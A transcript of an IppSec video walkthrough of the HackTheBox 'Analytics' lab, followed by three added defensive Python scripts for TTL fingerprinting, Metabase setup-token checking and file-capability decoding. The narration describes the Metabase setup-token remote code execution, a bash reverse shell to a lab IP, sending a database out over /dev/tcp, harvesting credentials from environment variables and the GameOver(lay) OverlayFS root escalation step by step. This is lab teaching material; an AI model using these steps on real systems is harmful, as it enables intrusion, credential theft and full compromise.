HackTheBox - Analytics

Captions
What's going on YouTube, this is IppSec doing Analytics from HackTheBox, which was a pretty easy machine if you don't care about understanding what the exploits are doing, because everything is just copy and paste, right? The foothold was in Metasploit, so you just discover Metabase is running and you can either throw the exploit or go do some research, discover how to enumerate the version and validate the exploit will work before you throw it. And then once you get a shell you just look at environment variables; it leaks a secret that you can use to SSH into the box, which is running an out-of-date kernel and it's vulnerable to the GameOver(lay) exploit. It's probably vulnerable to other things but that is the intended one, and a little while ago when this was released a lot of people were tweeting it out because the privesc actually fits in a tweet. You can just copy and paste the privesc one-liner, throw it in and you root. But we're going to understand what each of these exploits is going to do and do everything manually, because I think that's where all the fun is. So with that being said, let's just jump in.

As always we begin with an nmap: -sC for default scripts, -sV to enumerate versions, -oA to output all formats, put it in the nmap directory and call it analytics, then the IP address of 10.10.11.233. This can take some time to run so I've already run it. Looking at the results we have just two ports open. The first one is SSH on port 22 and its banner tells us it's an Ubuntu server. We also have HTTP on port 80; its banner tells us nginx, also running on Ubuntu, and there's also a script telling us that it forwards all requests to analytical.htb. So let's go ahead and add that to our hosts file: sudo vi /etc/hosts, and then we can add 10.10.11.233 analytical.htb, and let's go browse to it.

So let's go 10.10.11.233, and looking at this page the first thing I want to try to identify is if I know what framework this is running: is this just a static site, is it WordPress, Joomla, what does the backend look like? And nothing really stands out. We could try index.html, we get this page; we could try .php, we get not found. I'm going to guess this is a static website. The second thing I always look for are usernames, and we could log all these if we ever have to brute force users; we could build a word list like jsmith and so on, things like that. And then the last thing I look at is any type of place we can insert user input, right? So if I do this and click Send it's just going to redirect me back here, so it's not really sending any data. That's a lot of HackTheBox machines, and that's how you know you can kind of ignore this contact form, because it just redirects you; it's not sending data. We do have analytical doc as the domain there, we also have analytical doom, but nothing really sticks out to me. If I click these links it looks like it goes to the page, but if I click Log In we get redirected to a domain, data.analytical.htb. So let's add this to the hosts file: sudo vi /etc/hosts, and then we can add data.analytical.htb. Refresh, and we get a page called Metabase, and this is, I think, an open source application; it's not part of their static page.

The first thing I always like doing is just looking at the headers, right? So before we even look for exploits I just want to find more information about this. So let's turn intercept on and refresh both of them. I'm going to send that to Repeater. Did I turn intercept back on? I did. And let's send this to Repeater; we don't want maps, fonts, there we go. I'm going to name this request homepage, this one's going to be metabase. I'm going to make a request on both of them and I just look at the Server header. So I see nginx, I'm going to do it here, and the nginx version matches up, so that tells us it's the same nginx. Sometimes you'll see this different, and if it's different it's probably going into a Docker container or just going to a different host, right? This Expires is a bit odd, July 3rd 2001; that is an old thing. Normally when I see old I always look for CVEs; I don't think the software is from 2001, I don't know exactly why that's happening. We see the Date on the server and the date does match up, GMT, GMT. Sometimes you'll find the time zones different as well; that points to it being a different web server.

The other thing you can look at, and I think this is Docker so it's not going to do it, but the TTL. Sometimes you can identify if there's a firewall or some type of router, web application firewall, I'm trying to think, reverse proxy, that's the word, by looking at TTLs. So I would also go with tcpdump: tcpdump -i tun0, and I can say src port 80, and then when we make a request to each of these, so I'll make a request to the homepage, we see the TTL. We have to actually do -v for verbose; I'll also add the -n flag so we don't do DNS. We can see that response is always going to be 63. If we do it for the data one the response is also 63. So if you don't know what TTL is, this is time to live; whenever it performs a network hop this decrements. I think the network hop in Docker is done through iptables on Linux and that doesn't decrement; when doing it, it doesn't treat it as a network hop despite it going from probably the eth0 adapter to the docker0 adapter to get there. It just doesn't decrement the TTL, so you can't fingerprint it that way. But if this was a different box, like we had some type of gateway and it redirects to different networks, this TTL would help us fingerprint that, right? It's also useful for reverse proxies; I've seen this actually be a way to enumerate that one exists, and you know that it exists. It doesn't really help you that much, but in terms of recon I'd rather look at that than not look at it, right?

So let's look at Metabase. The first step is always to just look for any known CVEs, so we'll go to Exploit-DB. You can run searchsploit on your local box; I'm bad about keeping my stuff up to date, the typical security person, right? So I always go to the source because I know it's going to be up to date. We have, February 15th of 2024, something was uploaded: Metabase 0.46.6. So we want to see if we can get the version of Metabase. I'm sure if we googled around we could find someone talking about it, however we could just do it manually, right? The first thing I always look for is just searching "version" in the source, and Firefox is going to be weird about this: we can see it highlights this, but this isn't version right here, it's just that this whole wrapping is too long for Firefox to know what to do with. But if we went over to curl or even Burp Suite it would be a bit easier to read. So if I curl data.analytical.htb and let's just grep for version, we see version right here, date, tag, and we see 0.46.6. So this exploit would work. It's in Metasploit, which is probably what this is talking about, or they're using a Python one; there's also the Exploit-DB one. But I don't think we're going to learn as much if we just run the exploit, right? So let's do a little bit of research, make it hard for us. Whenever in CTFs I like stepping through it because you may learn something the creator of the exploit did; you learn more about it, so when you're going on the hunt you find things better, right? If you just run the script you're not really learning. If I was on the job and time was critical I'd probably just run the script, but I'm learning here, right?

So we Google Metabase, this, let's see, is this one? There's an exploit analysis. There we go, this is what I wanted, the Assetnote one, so we can close these. This is a really good one that's talking about it; I think these are the people that found the exploit. If you didn't want to use HackTheBox you could just use Docker to spin up the vulnerable version; this is always a great thing to do. Essentially the whole exploit revolves around you getting this setup token, and I think the setup token is used when you first set it up: it grants you access in order to create a Metabase instance and create the default user and stuff, and the setup token should be nulled out, but for some reason it isn't and we can access it, right? So it says we can view /api/session/properties, that is accessible without auth. So let's go ahead and view this: I'm going to go to metabase, going to make a GET request here, and we accessed it. We have information here; I'm just going to search for token, let's go, we got two matches, go to the second match and we have setup-token right here. So we're able to get the setup token, so we can complete the setup, and this is where the RCE is. Right here they're talking about how it happened. Eventually they landed on a commit made in January, the 22nd, of 2022, and they're looking at this because when they searched the internet they found a lot of the Metabase servers did not have a setup token there, but some of them did, and it translated down to this commit in January 2022 which removed this line. You can see these are in red, so they're removing that clear token, so it just left a token in that config. So any Metabase server stood up after that day would leak its setup key, and then it can use a setup key in order to get code execution.

They talk about going into the H2 database driver, which I think is like a SQL driver in Java, maybe; I don't know exactly what it is. But the normal way they got code execution, through the INIT parameter, was blocked by a blacklist because other vulnerabilities just use this; so think of this like a LOLBin or just a gadget chain to get RCE. So they blocked this one. So once they had access they were looking for other ways to execute it, and they found TRACE_LEVEL_SYSTEM_OUT would also enable code execution. So here they're talking about chaining everything together, and we're not going to do this one because this is kind of just proving it. I guess we could; it's not getting code execution here, this is their way to prove it's vulnerable. So we have them using the metabase.jar, and this is also interesting: they can go in the jar file and pick a sample database, and they did this because they're touching a database; if they screw up they can hose the database itself and take Metabase down. However, through this zip wrapper they can go in the jar and get the sample database, so they're never touching the prod database, so they don't risk taking it down. It's always good to do that. And we can see them doing this; it's kind of like a SQL injection trick. They say they eventually hit the TRACE_LEVEL_SYSTEM_OUT, let's see, where was that, right here: they create the trigger, and then right here they're using a java.net.URL to open a connection. So this doesn't give RCE, it's just a way to enumerate that it is vulnerable.

So let's go ahead and copy this and we will Ctrl+R, let's change the request method, I'm going to change it to application/json, always modify your Content-Type, and then when we paste this... and it wasn't properties, right, it was setup/validate. We're going to get a failure here because I forgot to do one thing, the token. So let's go ahead and grab our token, that was right here, so I'm going to grab this, go over here, we'll put in the token, and it's hung because it's trying to reach example.com. Let's go to 10.10.14, whoops, let's go 10.10.14.8. And let's see, we could stand up a simple HTTP server but I'm not; I'm just going to use netcat, and the reason why is I want to see all the headers that come across. So I'm going to do nc -lvnp 8000, going to send this request again, go here, and we can see Java reaching back to us, right? And the whole reason I didn't do the Python SimpleHTTPServer or http.server is we miss a lot of the data that you get from the headers. Like on my initial exploit I always like seeing the User-Agent, things like that, right?

So we have that. If we keep reading the post, they talk about a good way to get code execution is this one right here, zip, Metabase, database. Let's go here, yep, they're doing a bash payload here. So I'm going to copy this database line, let's go here, copy everything, paste, and this is a way to avoid spaces, right? So they're doing the echo command here, and whenever there's a space in this bracket or a comma in the bracket it's going to translate to that space. I think they did this because arguments are delimited by space and they did a bash -c here, so instead of dealing with quote apocalypse, because they used a single quote here and a double quote here, they could probably escape a quote, right, they decided let's just treat space as a bad character and avoid it, which I like. We've got to replace this, and this is just a reverse shell. So let's do echo -n, let's see, they're calling it with bash -i, I think we just do this; well, they call it with bash -i so that should be fine: .8, 9001, 0>&1, and then let's pipe it over to base64. They didn't do this; I always like doing it, and you're getting rid of any dangerous characters. So let's see, where is that plus? There we go, no plus there, add a space here, no plus there, so now this is just pure alphanumeric. It's just one thing I always like doing because that plus could screw up and waste a lot of time. So we have this exploit, let's listen on 9001, run it, it's hung, and we get a connection back. Awesome.

So it looks like it's working. We don't have an actual prompt; that's why I always do -v, because if I didn't do -v there, let's just show you: we run, maybe Ctrl+Z a few times, I think I have a connection right now, right? I don't see anything. ls, I do. But with the -v it tells you when that connection's made, which is really nice, right? So it doesn't send you a shell; you'll get one next time, like when you type a line. So let's do python3 -c 'import pty; pty.spawn("/bin/bash")'. Do we have script? We don't. So we can't get a proper PTY, so in that case I like using rlwrap just so I have my up and down arrows. Can we just type bash and get a prompt? That's annoying. I'm sure we could finagle a way and get it but I'm not going to waste time.

So let's see, we're in metabase. We could strings metabase.db; ls -la metabase.db, let's see, is this a symlink? stat, oh, it's a directory, okay. And we could strings it to see if we can get any credentials out of it; it's probably SQLite. Oh god, that's a lot of data, that was a mistake, that was a big mistake. Okay, we can file against metabase.db.mv.db. Let's just send it to ourselves: nc -lvnp 9001 > metabase.db.mv.db, we can cat this to /dev/tcp/10.10.14.8/9001, there we go, and then we can file against it; we just get data. The other thing I want to do is try to figure out credentials, right? We do ls -la on /; we do know we're in a Docker environment. There is /app, so let's go in /app, run_metabase.sh, don't see anything there; I was looking for a configuration file, right? Another good thing to do whenever you're on a web server: we are the metabase user, we can look at the environment and see what environment variables there are, because that may also just hold the credentials if you can't find the config. We don't have the DB pass; the hostname is probably the Docker container, JDBC database file, and we have a user and password: metalytics and analytics DS 2023. So let's go ahead and try SSH, let's just copy this @10.10.11.233 and then let's try this password, and we get logged in. Awesome.

So now this next step is a little bit hard to find; it's just one of those things you should always look at, because I don't know any good, easy automated tools to run. Maybe Linux Exploit Suggester finds it, and if it does then linpeas should find it, because linpeas imports this. Let's just run it. Because it's a kernel exploit, you may think: why can't they just look at the version of the kernel and know it's vulnerable, right? The thing is, so many distros have so many versions of kernels and they all label it somewhat differently, and it's just a huge pain to find if something's affected, right? Because this Ubuntu, let's see, cat /etc/lsb-release, we're on Jammy; if we're on Focal or something, all the versions would be different. Like sometimes the five version's vulnerable as well as the six; it's a whole mess. You may think it's easy, but until you start looking at it you realize what difficulty it is making a program that looks at a kernel and identifies it's vulnerable. And maybe I'm wrong, maybe it is easy, but I remember running Linux Exploit Suggester once, being like, man, I could do a better job with that, and the answer was, oh my god, there are so many hard ways, weird things I didn't think of when trying to do this. So let's just run this. This is why you get all these old CVEs; we can ignore all these 2021 ones, and I don't think it found it, and that may just be that it's not in the database, or maybe it didn't flag correctly, right? We see it updated last month.

So let's just go with uname -a and I'm going to Google this. So if we say that exploit I'm guessing we'll get the GameOver(lay) exploit, right? Yeah, we get one right here; oddly enough L exploit comes up. And there's a lot of hype around this vulnerability; this is the one that everyone was talking about, it can fit in a tweet that you can privesc, right? Here's the original payload, here's one adjusted for Twitter. Let's see, let's just run it, and instead of os.system('id')... actually, mkdir exploit, cd exploit, mkdir 1; it'll be easier to run multiple things this way. So if I just run this, boom, I am root, and we can go in /root. We should have... I'm not sure why that one didn't work. Let's see, upper: import os, os.setuid(0), os.system. I wonder if it's, I bet it's bash without the -p. Nope, it worked that time. I don't know why when I pasted it didn't work, right? But we don't really learn anything doing it that way, just running it, so let's talk about this exploit.

The better one to go to is this blog post. I think I talked about it in TwoMillion as well, because this vulnerability is really funny, and they talk about it here. Essentially OverlayFS is a complicated file system, and I mainly know it for Docker, because what it enables you to do is lay a file system on top of another one, right? And you may be confused why you want to do that, right? So let's say you have a Docker image and you want to spawn four containers off that image. You don't want to make the root file system four times because that's going to take a lot of disk space, so you'd make that root file system on the lower thing, and then the upper would be the changes you make to that file system, and that would be your container: the combination between lower and upper. And that way you can use the same base directory structure for multiple containers and not take up more space, because the upper directory is just tracking the changes. Hopefully I didn't mix up the two, but that is my understanding of OverlayFS. Now the vulnerability comes into play with special file attributes. A long time ago, well, maybe not a long time ago, I think it was earlier 2023 or whenever TwoMillion was, when you did something with this file system the setuid bit would stick, and that created a privesc, because when you're in the upper namespace you can set your user to be whatever you want. So you create a setuid file, get it cloned over, then you exit that namespace and now bash has setuid and you can execute it as root. That's bad, right? They fixed that, but they forgot about capabilities, which is another way binaries can escalate privileges, and we could exploit it again, and that's what this is.

So let's take a look through the exploit. I think I just closed it, right? No, we have this Twitter one; we'll use this. Okay, let's see, is that the full payload? It's missing an unshare, right? Yeah, okay. So the first thing it does is it's going to do unshare -rm; this is also an argument to execute a command, but we're not going to do that right away, so we're just going to do unshare -rm. And I forget the m; the r is going to be root, let's see, -m, and mount. So essentially we created a root namespace; now we're not really root, if I go to ls /root we can't open it, we're just root in the namespace we created. So in this namespace we're going to create a lower directory and upper directory, I think this is a working directory, and m I think is merge. So we create all those, and then for the sake of saving space they use all these stars, but really they just want to copy python3, so let's do /usr/bin/python3 into the lower. Okay, so now we want to set the capability of python3, so we're giving it the setuid capability, and now we're going to perform the mount. So we'll do mount -t overlay overlay -o, remount, lowerdir=l, upperdir=u, workdir=w, and m, I want to say, is merge; I may be wrong with that. So now we created the structure, and what we're going to do is we're going to touch every file in this m directory, and what that's going to do is signify a change to it, so the system copies it from the lower directory to the upper directory. Okay, we've done that, and oh, they have to put an exit here I think, so the exploit is done. So now if we do python3 on the upper directory we execute the upper directory's python3; we can import os, os.setuid(0), and then os.system bash, and then ls /root. So we just did that exploit manually.

Now the really weird thing, let's go back a step. If we look at this, so let's just do a ls -la on upper python3 and lower python3, they look the same. That's right, we use capabilities, not setuid. Let's do a getcap lower python3: we have that capability; upper python3, so you would think I can execute this, right? What's going to happen if we import os, because we do see these look the same, right, and we do os.setuid(0): operation not permitted. This is really bizarre, right? These files have the same capability; what happened here? Well, what happened is there's a second bit that gets set, and that's when the system copies it from the lower to the upper; it's going to start trusting the namespace. And you normally can do it with getfattr, I think, like that, but this binary doesn't exist on the machine. So in order to work around that I'm going to make a Python script and we're going to use the os module to pretty much mimic what we wanted to do with getfattr. So we'll import os and then we'll say lower = l/python3, and we can say for attribute in os.listxattr on lower, then we want to get the value, so we'll os.getxattr on the same thing, and we want to just print it, so we'll print attribute, value. Then let's do the same thing for the upper. Man, I scripted this horribly, but oh well, no point of return. Okay, python3 temp.py; getx is missing "attr", os.getxattr, that's what we need, I think it's better than that. There we go, the capability is slightly different. I honestly expected something a little bit different; I wanted it to show me the capability that I'm missing, because you can see these are definitely different, but not in a way I expected. Let's just clean this up by putting a print lower and a print upper here so we know exactly what programs we're looking at, right, and we run that, we have this. I'm guessing if I was root maybe that would change it up, but I don't know what these bits are in the security.capability, and that may be what is screwing it up. So it's either those bits are important and I don't know how to read this, or, let's do u/python3, import os, os.setuid(0), os.system bash, and we can exploit or run this again, and that's what did it. We also have a trusted.overlay.origin bit, so it's either this, or the file having this, and these bits say hey, don't trust this capability, it came from OverlayFS, I don't know what that is. Or maybe it's this saying use the permission bit in the overlay system and that's how it gets the root user. I really don't know exactly why, but the main goal here was just showing you that sometimes your tools lie, and when you do the, was it getfattr or getcap, yeah, it was getcap u/python3, l/python3, they look the same, but when you look at them more in depth you can see they're different. So that's going to be the box. Hopefully you learned a little bit about the OverlayFS exploit and Metabase, and enjoy the video, take care and I'll see you all next time.
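The TTL check from the recon part of the video (tcpdump -n -v on the replies from each service, then compare the TTLs), as an added example that is not part of the video or its transcript: the parser below reads tcpdump -v output, pairs each IP header line with the indented flow line that follows it, guesses the sender's default TTL from the usual 64/128/255 values and reports the hop distance per service. It goes one step beyond the video by flagging when services on the same IP answer from different hop distances. The tcpdump lines are constructed to match the format the video uses, not captured from the box, and the third service on port 8080 is invented to show the case where distances differ.

```python
import re
from collections import defaultdict

# Constructed sample of `tcpdump -n -v` output (not a capture from the box).
# The first two replies are the two vhosts behind the same nginx on port 80;
# the third is an assumed extra service whose TTL implies a different origin.
SAMPLE_TCPDUMP = """\
12:00:01.000001 IP (tos 0x0, ttl 63, id 0, offset 0, flags [DF], proto TCP (6), length 60)
    10.10.11.233.80 > 10.10.14.8.51234: Flags [S.], seq 1, ack 2, win 65160, length 0
12:00:02.000001 IP (tos 0x0, ttl 63, id 0, offset 0, flags [DF], proto TCP (6), length 60)
    10.10.11.233.80 > 10.10.14.8.51235: Flags [S.], seq 1, ack 2, win 65160, length 0
12:00:03.000001 IP (tos 0x0, ttl 126, id 0, offset 0, flags [DF], proto TCP (6), length 52)
    10.10.11.233.8080 > 10.10.14.8.51236: Flags [S.], seq 1, ack 2, win 8192, length 0
"""

TTL_RE = re.compile(r"\bttl (\d+),")
FLOW_RE = re.compile(r"^\s+(\d+(?:\.\d+){3})\.(\d+) > \d")
INITIAL_TTLS = (64, 128, 255)  # common defaults: Linux/BSD, Windows, network gear


def guess_initial_ttl(ttl):
    """Smallest common default TTL that is >= the observed value (None if > 255)."""
    for initial in INITIAL_TTLS:
        if ttl <= initial:
            return initial
    return None


def parse_ttls(text):
    """Map (src_ip, src_port) -> set of observed TTLs from `tcpdump -n -v` output.

    tcpdump -v prints the IP header (with the TTL) on one line and the TCP
    flow on the indented line after it, so the TTL is carried to the next line.
    """
    observed = defaultdict(set)
    pending_ttl = None
    for line in text.splitlines():
        m = TTL_RE.search(line)
        if m:
            pending_ttl = int(m.group(1))
            continue
        m = FLOW_RE.match(line)
        if m and pending_ttl is not None:
            observed[(m.group(1), int(m.group(2)))].add(pending_ttl)
            pending_ttl = None
    return dict(observed)


def fingerprint(text):
    """Per service: observed TTLs, guessed initial TTL and hop distance."""
    report = {}
    for key, ttls in parse_ttls(text).items():
        ttl = max(ttls)  # the observed value closest to the origin's default
        initial = guess_initial_ttl(ttl)
        report[key] = {
            "ttls": sorted(ttls),
            "initial_ttl": initial,
            "hops": None if initial is None else initial - ttl,
        }
    return report


def same_origin(text, ip):
    """True if every service seen on `ip` answers from the same hop distance.

    Equal distances do not prove one host (the video notes Docker's iptables
    port forward does not decrement the TTL); unequal distances do show that
    a proxy, gateway or second host sits behind at least one of the ports.
    """
    hops = {v["hops"] for (host, _), v in fingerprint(text).items() if host == ip}
    return len(hops) <= 1


if __name__ == "__main__":
    for (ip, port), info in sorted(fingerprint(SAMPLE_TCPDUMP).items()):
        print("%s:%d ttl=%s initial=%s hops=%s" % (ip, port, info["ttls"], info["initial_ttl"], info["hops"]))
    print("same origin:", same_origin(SAMPLE_TCPDUMP, "10.10.11.233"))
```

Feed it a real capture with `tcpdump -n -v -i tun0 'src port 80 or src port 443' > replies.txt` and `fingerprint(open("replies.txt").read())`; as the video says, the check is cheap enough to always run even when, as with a Docker port forward, it turns out not to discriminate.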
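The Metabase checks from the video (grep the front page for the version, then confirm the unauthenticated properties endpoint still returns a setup token) as one defender-side script, added here and not taken from the video, the Assetnote write-up or the Metabase project. It is meant to be pointed at an instance you operate. The HTML and JSON samples are constructed; the key names `version`/`tag` and `setup-token` follow what the video shows in the page source and the properties response, and the endpoint path in `check_instance` is the one the video visits.

```python
import json
import re
from urllib.request import Request, urlopen

# Constructed stand-ins (not fetched from the box) for the two things the video
# inspects: the front page, which embeds the build info, and the JSON from the
# unauthenticated properties endpoint. The token value is a placeholder.
SAMPLE_HTML = ('<html><script>window.MetabaseBootstrap = {"version":{"date":"2023-07-26",'
               '"tag":"v0.46.6","src_hash":"placeholder"},"setup-token":null};</script></html>')
SAMPLE_PROPERTIES = json.dumps({
    "version": {"date": "2023-07-26", "tag": "v0.46.6"},
    "setup-token": "00000000-0000-0000-0000-000000000000",  # placeholder
    "engines": {"h2": {}},
})

VERSION_TAG_RE = re.compile(r'"tag"\s*:\s*"v?(\d+(?:\.\d+)+)"')


def version_from_html(html):
    """Pull the build tag out of the page source, as the video's curl | grep does."""
    m = VERSION_TAG_RE.search(html)
    return m.group(1) if m else None


def assess_properties(properties_json):
    """Report the version and whether the setup token is still exposed.

    The setup token is only meant to exist until first-run setup completes;
    a non-null value on an already configured instance is the finding the
    video describes, and it is visible to anyone who can reach the endpoint.
    """
    props = json.loads(properties_json)
    tag = (props.get("version") or {}).get("tag")
    token = props.get("setup-token")
    return {
        "version": tag.lstrip("v") if tag else None,
        "setup_token_exposed": bool(token),
        "finding": ("setup token still present on a configured instance; "
                    "upgrade Metabase and confirm the token is cleared") if token else None,
    }


def check_instance(base_url, timeout=10):
    """Live check against your own instance (does network I/O; not run by the tests)."""
    req = Request(base_url.rstrip("/") + "/api/session/properties",
                  headers={"User-Agent": "metabase-setup-token-check"})
    with urlopen(req, timeout=timeout) as resp:
        return assess_properties(resp.read().decode("utf-8"))


if __name__ == "__main__":
    print("version from html:", version_from_html(SAMPLE_HTML))
    print(assess_properties(SAMPLE_PROPERTIES))
```

Run `check_instance("https://metabase.example.internal")` (hostname is a placeholder) from a monitoring job; a `setup_token_exposed` of True on a production instance is the condition to alert on, independent of which version string the page reports.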
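The xattr comparison at the end of the video (os.listxattr/os.getxattr on the lower and upper python3, with the two `security.capability` values differing even though getcap prints the same thing for both) as an added example, not the script written in the video and not kernel code: a decoder for the raw `security.capability` bytes that prints what the capability name alone hides. The byte layout follows the kernel's vfs_cap_data/vfs_ns_cap_data structures: a little-endian magic word (revision in the top byte, "effective" flag in the low bit), one or two permitted/inheritable mask pairs, and for revision 3 a trailing rootid, the uid that counts as root for that capability. The two byte strings at the bottom are constructed to illustrate the two shapes; they were not read from the box.

```python
import os
import struct

VFS_CAP_FLAGS_EFFECTIVE = 0x000001
VFS_CAP_U32 = {1: 1, 2: 2, 3: 2}  # number of permitted/inheritable pairs per revision
CAP_NAMES = {0: "cap_chown", 1: "cap_dac_override", 2: "cap_dac_read_search",
             3: "cap_fowner", 4: "cap_fsetid", 5: "cap_kill", 6: "cap_setgid",
             7: "cap_setuid", 8: "cap_setpcap", 12: "cap_net_admin",
             13: "cap_net_raw", 19: "cap_sys_ptrace", 21: "cap_sys_admin",
             31: "cap_setfcap"}  # partial table; unlisted bits print as cap_<n>


def cap_names(mask):
    """Names of the capability bits set in a 64-bit mask, lowest bit first."""
    return [CAP_NAMES.get(bit, "cap_%d" % bit) for bit in range(64) if mask >> bit & 1]


def decode_vfs_cap(raw):
    """Decode raw security.capability bytes into revision, flags, masks and rootid."""
    if len(raw) < 4:
        raise ValueError("xattr too short")
    magic_etc, = struct.unpack_from("<I", raw, 0)
    revision = magic_etc >> 24
    if revision not in VFS_CAP_U32:
        raise ValueError("unknown vfs_cap revision %d" % revision)
    words = VFS_CAP_U32[revision]
    expected = 4 + 8 * words + (4 if revision == 3 else 0)
    if len(raw) != expected:
        raise ValueError("revision %d needs %d bytes, got %d" % (revision, expected, len(raw)))
    permitted = inheritable = 0
    for i in range(words):
        p, inh = struct.unpack_from("<II", raw, 4 + 8 * i)
        permitted |= p << (32 * i)
        inheritable |= inh << (32 * i)
    rootid = struct.unpack_from("<I", raw, 4 + 8 * words)[0] if revision == 3 else None
    return {
        "revision": revision,
        "effective": bool(magic_etc & VFS_CAP_FLAGS_EFFECTIVE),
        "permitted": cap_names(permitted),
        "inheritable": cap_names(inheritable),
        "rootid": rootid,
    }


def honored_in_initial_ns(cap):
    """Revision 1/2 records, and revision 3 records with rootid 0, apply to
    processes in the initial user namespace. A revision 3 record with another
    rootid only applies inside a user namespace in which that uid is root
    (or a descendant of it), which is why a cap set from `unshare -r` is
    harmless outside that namespace until something copies it without the rootid."""
    return cap["revision"] != 3 or cap["rootid"] == 0


def read_file_caps(path):
    """Linux only: read and decode security.capability from `path` (None if absent)."""
    try:
        raw = os.getxattr(path, "security.capability")
    except OSError:
        return None
    return decode_vfs_cap(raw)


# Constructed records (not read from the box): cap_setuid=ep as the kernel
# stores it when setcap runs inside an `unshare -r` namespace whose root maps
# to uid 1000 (revision 3, rootid 1000), and the same capability as a
# namespace-less revision 2 record.
NS_CAP_SETUID = struct.pack("<IIIIII", 0x03000000 | VFS_CAP_FLAGS_EFFECTIVE, 1 << 7, 0, 0, 0, 1000)
GLOBAL_CAP_SETUID = struct.pack("<IIIII", 0x02000000 | VFS_CAP_FLAGS_EFFECTIVE, 1 << 7, 0, 0, 0)

if __name__ == "__main__":
    for label, raw in (("namespaced", NS_CAP_SETUID), ("global", GLOBAL_CAP_SETUID)):
        cap = decode_vfs_cap(raw)
        print(label, cap, "honored in init ns:", honored_in_initial_ns(cap))
```

On a live system compare `read_file_caps("l/python3")` with `read_file_caps("u/python3")` as the video does: the name `cap_setuid` can match on both while `revision` and `rootid` differ, and that difference, not the name, decides where the capability is honored. For defenders, a scan of setcap'd binaries that records rootid as well as the names is the check that catches a copied-up capability that getcap reports as identical.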
Info
Channel: IppSec
Views: 11,573
Id: p1NsQSGeDv0
Length: 32min 44sec (1964 seconds)
Published: Sat Mar 23 2024